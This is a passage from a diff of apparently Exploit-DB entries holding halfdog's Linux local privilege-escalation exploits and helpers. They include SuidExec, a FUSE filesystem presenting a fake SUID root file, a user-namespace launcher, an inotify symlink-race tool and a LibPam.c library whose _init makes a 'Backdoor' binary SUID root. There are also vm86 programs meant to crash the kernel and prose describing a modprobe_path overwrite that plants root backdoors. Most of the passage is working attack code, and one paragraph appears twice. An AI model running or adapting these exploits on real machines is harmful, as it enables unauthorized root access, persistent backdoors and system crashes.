return(1);
}
close(setGroupsFd);
}
if(setUidMapFlag) {
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
int uidMapFd=open(idMapFileName, O_WRONLY);
if(uidMapFd<0) {
fprintf(stderr, "Failed to open uid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(uidMapFd);
}
if(setGidMapFlag) {
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
int gidMapFd=open(idMapFileName, O_WRONLY);
if(gidMapFd<0) {
fprintf(stderr, "Failed to open gid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
if(result<0) {
if(noSetGroupsFlag) {
fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
} else {
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
}
close(gidMapFd);
}
if(waitpid(pid, NULL, 0)==-1) {
fprintf(stderr, "Wait failed\n");
return(1);
}
return(0);
}
--- EOF ---
--- SuidExec.c---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool changes to uid/gid 0 and executes the program supplied
* via arguments.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv) {
if(argc<2) {
fprintf(stderr, "Usage: %s [execargs]\n", argv[0]);
return(1);
}
int rUid, eUid, sUid, rGid, eGid, sGid;
getresuid(&rUid, &eUid, &sUid);
getresgid(&rGid, &eGid, &sGid);
if(setresuid(sUid, sUid, rUid)) {
fprintf(stderr, "Failed to set uids\n");
return(1);
}
if(setresgid(sGid, sGid, rGid)) {
fprintf(stderr, "Failed to set gids\n");
return(1);
}
execve(argv[1], argv+1, environ);
return(1);
}
--- EOF ---

501
platforms/linux/local/41763.txt
View file

@ -8,10 +8,11 @@ Problem description: On Ubuntu Wily it is possible to place an USERNS overlayfs
Basic exploitation sequence is:
Mount fuse filesystem exposing one world writable SUID binary
Create USERNS
Mount overlayfs on top of fuse
Open the SUID binary RDWR in overlayfs, thus triggering copy_up
- Mount fuse filesystem exposing one world writable SUID binary
- Create USERNS
- Mount overlayfs on top of fuse
- Open the SUID binary RDWR in overlayfs, thus triggering copy_up
This can be archived, e.g.
SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c)
@ -33,4 +34,494 @@ test# ls -al upper/file
-rwsr-xr-x 1 root root 9088 Jan 22 09:18 upper/file
test# upper/file /bin/bash
root# id
uid=0(root) gid=100(users) groups=100(users)
uid=0(root) gid=100(users) groups=100(users)
--- SuidExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool changes to uid/gid 0 and executes the program supplied
* via arguments.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv) {
if(argc<2) {
fprintf(stderr, "Usage: %s [execargs]\n", argv[0]);
return(1);
}
int rUid, eUid, sUid, rGid, eGid, sGid;
getresuid(&rUid, &eUid, &sUid);
getresgid(&rGid, &eGid, &sGid);
if(setresuid(sUid, sUid, rUid)) {
fprintf(stderr, "Failed to set uids\n");
return(1);
}
if(setresgid(sGid, sGid, rGid)) {
fprintf(stderr, "Failed to set gids\n");
return(1);
}
execve(argv[1], argv+1, environ);
return(1);
}
--- EOF ---
--- FuseMinimal.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* Minimal userspace file system demo, compile using
* gcc -D_FILE_OFFSET_BITS=64 -Wall FuseMinimal.c -o FuseMinimal -lfuse
*
* See also /usr/include/fuse/fuse.h
*/
#define FUSE_USE_VERSION 28
#include <errno.h>
#include <fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static FILE *logFile;
static char *fileNameNormal="/file";
static char *fileNameCharDev="/chardev";
static char *fileNameNormalSubFile="/dir/file";
static char *realFileName="./RealFile";
static int realFileHandle=-1;
static int io_getattr(const char *path, struct stat *stbuf) {
fprintf(logFile, "io_getattr(path=\"%s\", stbuf=0x%p)\n",
path, stbuf);
fflush(logFile);
int res=-ENOENT;
memset(stbuf, 0, sizeof(struct stat));
if(strcmp(path, "/") == 0) {
stbuf->st_mode=S_IFDIR|0755;
stbuf->st_nlink=2;
res=0;
} else if(strcmp(path, fileNameCharDev)==0) {
// stbuf->st_dev=makedev(5, 2);
stbuf->st_mode=S_IFCHR|0777;
stbuf->st_rdev=makedev(5, 2);
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=100;
res=0;
} else if(strcmp(path, "/dir")==0) {
stbuf->st_mode=S_IFDIR|S_ISGID|0777;
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=1<<12;
res=0;
} else if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
if(realFileName) {
if(fstat(realFileHandle, stbuf)) {
fprintf(logFile, "Stat of %s failed, error %d (%s)\n",
realFileName, errno, strerror(errno));
} else {
// Just change uid/suid, which is far more interesting during testing
stbuf->st_mode|=S_ISUID;
stbuf->st_uid=0;
stbuf->st_gid=0;
}
} else {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
}
stbuf->st_nlink=1; // Number of hard links
res=0;
}
return(res);
}
static int io_readlink(const char *path, char *buffer, size_t length) {
fprintf(logFile, "io_readlink(path=\"%s\", buffer=0x%p, length=0x%lx)\n",
path, buffer, (long)length);
fflush(logFile);
return(-1);
}
static int io_unlink(const char *path) {
fprintf(logFile, "io_unlink(path=\"%s\")\n", path);
fflush(logFile);
return(0);
}
static int io_rename(const char *oldPath, const char *newPath) {
fprintf(logFile, "io_rename(oldPath=\"%s\", newPath=\"%s\")\n",
oldPath, newPath);
fflush(logFile);
return(0);
}
static int io_chmod(const char *path, mode_t mode) {
fprintf(logFile, "io_chmod(path=\"%s\", mode=0x%x)\n", path, mode);
fflush(logFile);
return(0);
}
static int io_chown(const char *path, uid_t uid, gid_t gid) {
fprintf(logFile, "io_chown(path=\"%s\", uid=%d, gid=%d)\n", path, uid, gid);
fflush(logFile);
return(0);
}
/** Open a file. This function checks access permissions and may
* associate a file info structure for future access.
* @returns 0 when open OK
*/
static int io_open(const char *path, struct fuse_file_info *fi) {
fprintf(logFile, "io_open(path=\"%s\", fi=0x%p)\n", path, fi);
fflush(logFile);
return(0);
}
static int io_read(const char *path, char *buffer, size_t length,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_read(path=\"%s\", buffer=0x%p, length=0x%lx, offset=0x%lx, fi=0x%p)\n",
path, buffer, (long)length, (long)offset, fi);
fflush(logFile);
if(length<0) return(-1);
if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
if(!realFileName) {
if((offset<0)||(offset>4)) return(-1);
if(offset+length>4) length=4-offset;
if(length>0) memcpy(buffer, "xxxx", length);
return(length);
}
if(lseek(realFileHandle, offset, SEEK_SET)==(off_t)-1) {
fprintf(stderr, "read: seek on %s failed\n", path);
return(-1);
}
return(read(realFileHandle, buffer, length));
}
return(-1);
}
static int io_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_readdir(path=\"%s\", buf=0x%p, filler=0x%p, offset=0x%lx, fi=0x%p)\n",
path, buf, filler, ((long)offset), fi);
fflush(logFile);
(void) offset;
(void) fi;
if(!strcmp(path, "/")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, fileNameCharDev+1, NULL, 0);
filler(buf, "dir", NULL, 0);
filler(buf, fileNameNormal+1, NULL, 0);
return(0);
} else if(!strcmp(path, "/dir")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, "file", NULL, 0);
return(0);
}
return -ENOENT;
}
static int io_access(const char *path, int mode) {
fprintf(logFile, "io_access(path=\"%s\", mode=0x%x)\n",
path, mode);
fflush(logFile);
return(0);
}
static int io_ioctl(const char *path, int cmd, void *arg,
struct fuse_file_info *fi, unsigned int flags, void *data) {
fprintf(logFile, "io_ioctl(path=\"%s\", cmd=0x%x, arg=0x%p, fi=0x%p, flags=0x%x, data=0x%p)\n",
path, cmd, arg, fi, flags, data);
fflush(logFile);
return(0);
}
static struct fuse_operations hello_oper = {
.getattr = io_getattr,
.readlink = io_readlink,
// .getdir = deprecated
// .mknod
// .mkdir
.unlink = io_unlink,
// .rmdir
// .symlink
.rename = io_rename,
// .link
.chmod = io_chmod,
.chown = io_chown,
// .truncate
// .utime
.open = io_open,
.read = io_read,
// .write
// .statfs
// .flush
// .release
// .fsync
// .setxattr
// .getxattr
// .listxattr
// .removexattr
// .opendir
.readdir = io_readdir,
// .releasedir
// .fsyncdir
// .init
// .destroy
.access = io_access,
// .create
// .ftruncate
// .fgetattr
// .lock
// .utimens
// .bmap
.ioctl = io_ioctl,
// .poll
};
int main(int argc, char *argv[]) {
char buffer[128];
realFileHandle=open(realFileName, O_RDWR);
if(realFileHandle<0) {
fprintf(stderr, "Failed to open %s\n", realFileName);
exit(1);
}
snprintf(buffer, sizeof(buffer), "FuseMinimal-%d.log", getpid());
logFile=fopen(buffer, "a");
if(!logFile) {
fprintf(stderr, "Failed to open log: %s\n", (char*)strerror(errno));
return(1);
}
fprintf(logFile, "Starting fuse init\n");
fflush(logFile);
return fuse_main(argc, argv, &hello_oper, NULL);
}
--- EOF ---
--- UserNamespaceExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool creates a new namespace, initialize the uid/gid
* map and execute the program given as argument. This is similar
* to unshare(1) from newer util-linux packages.
*
* gcc -o UserNamespaceExec UserNamespaceExec.c
*
* Usage: UserNamespaceExec [options] -- [program] [args]
*
* * --NoSetGroups: do not disable group chanages
* * --NoSetGidMap:
* * --NoSetUidMap:
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
extern char **environ;
static int childFunc(void *arg) {
int parentPid=getppid();
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
while((geteuid()!=0)&&(parentPid==getppid())) {
sleep(1);
}
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
int result=execve(((char**)arg)[0], (char**)arg, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
int main(int argc, char *argv[]) {
int argPos;
int noSetGroupsFlag=0;
int setGidMapFlag=1;
int setUidMapFlag=1;
int result;
for(argPos=1; argPos<argc; argPos++) {
char *argName=argv[argPos];
if(!strcmp(argName, "--")) {
argPos++;
break;
}
if(strncmp(argName, "--", 2)) {
break;
}
if(!strcmp(argName, "--NoSetGidMap")) {
setGidMapFlag=0;
continue;
}
if(!strcmp(argName, "--NoSetGroups")) {
noSetGroupsFlag=1;
continue;
}
if(!strcmp(argName, "--NoSetUidMap")) {
setUidMapFlag=0;
continue;
}
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
exit(1);
}
// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos);
if(pid==-1) {
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
char idMapFileName[128];
char idMapData[128];
if(!noSetGroupsFlag) {
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
if(setGroupsFd<0) {
fprintf(stderr, "Failed to open setgroups\n");
return(1);
}
result=write(setGroupsFd, "deny", 4);
if(result<0) {
fprintf(stderr, "Failed to disable setgroups\n");
return(1);
}
close(setGroupsFd);
}
if(setUidMapFlag) {
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
int uidMapFd=open(idMapFileName, O_WRONLY);
if(uidMapFd<0) {
fprintf(stderr, "Failed to open uid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(uidMapFd);
}
if(setGidMapFlag) {
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
int gidMapFd=open(idMapFileName, O_WRONLY);
if(gidMapFd<0) {
fprintf(stderr, "Failed to open gid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
if(result<0) {
if(noSetGroupsFlag) {
fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
} else {
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
}
close(gidMapFd);
}
if(waitpid(pid, NULL, 0)==-1) {
fprintf(stderr, "Wait failed\n");
return(1);
}
return(0);
}
--- EOF ---

237
platforms/linux/local/41764.txt
View file

@ -22,10 +22,10 @@ if [ $? -eq 0 ]; then
Relevant targets are:
find and rm invocation is racy, symlinks on rm
rm can be invoked with one attacker controlled option
ls can be invoked with arbitrary number of attacker controlled command line options
gzip can be invoked with arbitrary number of attacker controlled options
- find and rm invocation is racy, symlinks on rm
- rm can be invoked with one attacker controlled option
- ls can be invoked with arbitrary number of attacker controlled command line options
- gzip can be invoked with arbitrary number of attacker controlled options
## Methods
@ -60,3 +60,232 @@ gcc -o Backdoor SuidExec.c
# Back to normal
./Backdoor /bin/sh -c 'cp --preserve=mode,timestamps -- libpam.so.0.83.1 /lib/x86_64-linux-gnu/libpam.so.0.83.1; chown root.root /lib/x86_64-linux-gnu/libpam.so.0.83.1; exec /bin/sh'
--- DirModifyInotify.c ---
/** This program waits for notify of file/directory to replace
* given directory with symlink.
*
* Usage: DirModifyInotify --Watch [watchfile0] --WatchCount [num]
* --MovePath [path] --MoveTarget [path] --LinkTarget [path] --Verbose
*
* Parameters:
* * --MoveTarget: If set, move path to that target location before
* attempting to symlink.
* * --LinkTarget: If set, the MovePath is replaced with link to
* this path
*
* Compile:
* gcc -o DirModifyInotify DirModifyInotify.c
*
* Copyright (c) 2010-2016 halfdog <me (%) halfdog.net>
*
* This software is provided by the copyright owner "as is" to
* study it but without any expressed or implied warranties, that
* this software is fit for any other purpose. If you try to compile
* or run it, you do it solely on your own risk and the copyright
* owner shall not be liable for any direct or indirect damage
* caused by this software.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <unistd.h>
int main(int argc, char **argv) {
char *movePath=NULL;
char *newDirName=NULL;
char *symlinkTarget=NULL;
int argPos;
int handle;
int inotifyHandle;
int inotifyDataSize=sizeof(struct inotify_event)*16;
struct inotify_event *inotifyData;
int randomVal;
int callCount;
int targetCallCount=0;
int verboseFlag=0;
int result;
if(argc<4) return(1);
inotifyHandle=inotify_init();
for(argPos=1; argPos<argc; argPos++) {
if(!strcmp(argv[argPos], "--Verbose")) {
verboseFlag=1;
continue;
}
if(!strcmp(argv[argPos], "--LinkTarget")) {
argPos++;
if(argPos==argc) return(1);
symlinkTarget=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--MovePath")) {
argPos++;
if(argPos==argc) return(1);
movePath=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--MoveTarget")) {
argPos++;
if(argPos==argc) return(1);
newDirName=argv[argPos];
continue;
}
if(!strcmp(argv[argPos], "--Watch")) {
argPos++;
if(argPos==argc) return(1);
//IN_ALL_EVENTS, IN_CLOSE_WRITE|IN_CLOSE_NOWRITE, IN_OPEN|IN_ACCESS
result=inotify_add_watch(inotifyHandle, argv[argPos], IN_ALL_EVENTS);
if(result==-1) {
fprintf(stderr, "Failed to add watch path %s, error %d\n",
argv[argPos], errno);
return(1);
}
continue;
}
if(!strcmp(argv[argPos], "--WatchCount")) {
argPos++;
if(argPos==argc) return(1);
targetCallCount=atoi(argv[argPos]);
continue;
}
fprintf(stderr, "Unknown option %s\n", argv[argPos]);
return(1);
}
if(!movePath) {
fprintf(stderr, "No move path specified!\n" \
"Usage: DirModifyInotify.c --Watch [watchfile0] --MovePath [path]\n" \
" --LinkTarget [path]\n");
return(1);
}
fprintf(stderr, "Using target call count %d\n", targetCallCount);
// Init name of new directory if not already defined.
if(!newDirName) {
newDirName=(char*)malloc(strlen(movePath)+256);
sprintf(newDirName, "%s-moved", movePath);
}
inotifyData=(struct inotify_event*)malloc(inotifyDataSize);
for(callCount=0; ; callCount++) {
result=read(inotifyHandle, inotifyData, inotifyDataSize);
if(callCount==targetCallCount) {
rename(movePath, newDirName);
// rmdir(movePath);
if(symlinkTarget) symlink(symlinkTarget, movePath);
fprintf(stderr, "Move triggered at count %d\n", callCount);
break;
}
if(verboseFlag) {
fprintf(stderr, "Received notify %d, result %d, error %s\n",
callCount, result, (result<0?strerror(errno):NULL));
}
if(result<0) {
break;
}
}
return(0);
}
--- EOF ---
--- LibPam.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This library just transforms an existing file into a SUID
* binary when the library is loaded.
*
* gcc -Wall -fPIC -c LibPam.c
* ld -shared -Bdynamic LibPam.o -L/lib -lc -o libPam.so
*/
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
/** Library initialization function, called by the linker. If not
* named _init, parameter has to be set during linking using -init=name
*/
extern void _init() {
fprintf(stderr, "LibPam.c: Within _init\n");
chown("/var/lib/ntp/Backdoor", 0, 0);
chmod("/var/lib/ntp/Backdoor", 04755);
}
--- EOF ---
--- SuidExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool changes to uid/gid 0 and executes the program supplied
* via arguments.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv) {
if(argc<2) {
fprintf(stderr, "Usage: %s [execargs]\n", argv[0]);
return(1);
}
int rUid, eUid, sUid, rGid, eGid, sGid;
getresuid(&rUid, &eUid, &sUid);
getresgid(&rGid, &eGid, &sGid);
if(setresuid(sUid, sUid, rUid)) {
fprintf(stderr, "Failed to set uids\n");
return(1);
}
if(setresgid(sGid, sGid, rGid)) {
fprintf(stderr, "Failed to set gids\n");
return(1);
}
execve(argv[1], argv+1, environ);
return(1);
}
--- EOF ---

469
platforms/linux/local/41766.txt
View file

@ -18,4 +18,471 @@ An improved version allows to bring the FPU into the same state without using th
When the NULL-page is mapped, the NULL-dereference could be used to fake a rw-semaphore data structure. In exit_shm, the kernel attemts to down_write the semaphore, which adds the value 0xffff0001 at a user-controllable location. Since the NULL-dereference does not allow arbitrary reads, the task memory layout is unknown, thus standard change of EUID of running task is not possible. Apart from that, we are in do_exit, so we would have to change another task. A suitable target is the shmem_xattr_handlers list, which is at an address known from System.map. Usually it contains two valid handlers and a NULL value to terminate the list. As we are lucky, the value after NULL is 1, thus adding 0xffff0001 to the position of the NULL-value plus 2 will will turn the NULL into 0x10000 (the first address above mmap_min_addr) and the following 1 value into NULL, thus terminating the handler list correctly again.
The code to perform those steps can be found in FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)
The modification of the shmem_xattr_handlers list is completely silent (could be a nice data-only backdoor) until someone performs a getxattr call on a mounted tempfs. Since such a file-system is mounted by default at /run/shm, another program can turn this into arbitrary ring-0 code execution. To avoid searching the process list to give EUID=0, an alternative approach was tested. When invoking the xattr-handlers, a single integer value write to another static address known from System.map (modprobe_path) will change the default modprobe userspace helper pathname from /sbin/modprobe to /tmp//modprobe. When unknown executable formats or network protocols are requested, the program /tmp//modprobe is executed as root, this demo just adds a script to turn /bin/dd into a SUID-binary. dd could then be used to modify libc to plant another backdoor there. The code to perform those steps can be found in ManipulatedXattrHandlerForPrivEscalation.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ManipulatedXattrHandlerForPrivEscalation.c).
The modification of the shmem_xattr_handlers list is completely silent (could be a nice data-only backdoor) until someone performs a getxattr call on a mounted tempfs. Since such a file-system is mounted by default at /run/shm, another program can turn this into arbitrary ring-0 code execution. To avoid searching the process list to give EUID=0, an alternative approach was tested. When invoking the xattr-handlers, a single integer value write to another static address known from System.map (modprobe_path) will change the default modprobe userspace helper pathname from /sbin/modprobe to /tmp//modprobe. When unknown executable formats or network protocols are requested, the program /tmp//modprobe is executed as root, this demo just adds a script to turn /bin/dd into a SUID-binary. dd could then be used to modify libc to plant another backdoor there. The code to perform those steps can be found in ManipulatedXattrHandlerForPrivEscalation.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ManipulatedXattrHandlerForPrivEscalation.c).
--- Virtual86SwitchToEmmsFault.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2013 halfdog <me (%) halfdog.net>
*
* This progam maps memory pages to the low range above 64k to
* avoid conflicts with /proc/sys/vm/mmap_min_addr and then
* triggers the virtual-86 mode. Due to unhandled FPU errors,
* task switch will fail afterwards, kernel will attempt to
* kill other tasks when switching.
*
* gcc -o Virtual86SwitchToEmmsFault Virtual86SwitchToEmmsFault.c
*
* See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>
static const char *DEDICATION="To the most adorable person met so far.";
static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
fprintf(stderr, "Handling signal\n");
}
void runTest(void *realMem) {
struct vm86plus_struct vm86struct;
int result;
memset(&vm86struct, 0, sizeof(vm86struct));
vm86struct.regs.eip=0x0;
vm86struct.regs.cs=0x1000;
// IF_MASK|IOPL_MASK
vm86struct.regs.eflags=0x3002;
vm86struct.regs.esp=0x400;
vm86struct.regs.ss=0x1000;
vm86struct.regs.ebp=vm86struct.regs.esp;
vm86struct.regs.ds=0x1000;
vm86struct.regs.fs=0x1000;
vm86struct.regs.gs=0x1000;
vm86struct.flags=0x0L;
vm86struct.screen_bitmap=0x0L;
vm86struct.cpu_type=0x0L;
alarm(1);
result=vm86(VM86_ENTER, &vm86struct);
if(result) {
fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
strerror(errno));
}
}
int main(int argc, char **argv) {
struct sigaction sigAction;
int realMemSize=1<<20;
void *realMem;
int result;
sigAction.sa_sigaction=handleSignal;
sigfillset(&sigAction.sa_mask);
sigAction.sa_flags=SA_SIGINFO;
sigAction.sa_restorer=NULL;
sigaction(SIGILL, &sigAction, NULL); // 4
sigaction(SIGFPE, &sigAction, NULL); // 8
sigaction(SIGSEGV, &sigAction, NULL); // 11
sigaction(SIGALRM, &sigAction, NULL); // 14
realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(realMem==(void*)-1) {
fprintf(stderr, "Failed to map real-mode memory space\n");
return(1);
}
memset(realMem, 0, realMemSize);
memcpy(realMem, "\xda\x44\x00\xd9\x2f\xae", 6);
runTest(realMem);
}
--- EOF ---
--- Virtual86RandomCode.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2013 halfdog <me (%) halfdog.net>
*
* This progam maps memory pages to the low range above 64k to
* avoid conflicts with /proc/sys/vm/mmap_min_addr and then
* triggers the virtual-86 mode.
*
* gcc -o Virtual86RandomCode Virtual86RandomCode.c
*
* Usage: ./Virtual86RandomCode < /dev/urandom > /dev/null
*
* See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>
static const char *DEDICATION="To the most adorable person met so far.";
static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
fprintf(stderr, "Handling signal\n");
}
int readFully(int inputFd, void *data, int length) {
int readLength=0;
int result;
while(length) {
result=read(inputFd, data, length);
if(result<0) {
if(!readLength) readLength=result;
break;
}
readLength+=result;
length-=result;
data+=result;
}
return(readLength);
}
void runTest(void *realMem) {
struct vm86plus_struct vm86struct;
int result;
memset(&vm86struct, 0, sizeof(vm86struct));
vm86struct.regs.eip=0x0;
vm86struct.regs.cs=0x1000;
// IF_MASK|IOPL_MASK
vm86struct.regs.eflags=0x3002;
// Do not use stack above
vm86struct.regs.esp=0x400;
vm86struct.regs.ss=0x1000;
vm86struct.regs.ebp=vm86struct.regs.esp;
vm86struct.regs.ds=0x1000;
vm86struct.regs.fs=0x1000;
vm86struct.regs.gs=0x1000;
vm86struct.flags=0x0L;
vm86struct.screen_bitmap=0x0L;
vm86struct.cpu_type=0x0L;
alarm(1);
result=vm86(VM86_ENTER, &vm86struct);
if(result) {
fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
strerror(errno));
}
}
int main(int argc, char **argv) {
struct sigaction sigAction;
int realMemSize=1<<20;
void *realMem;
int randomFd=0;
int result;
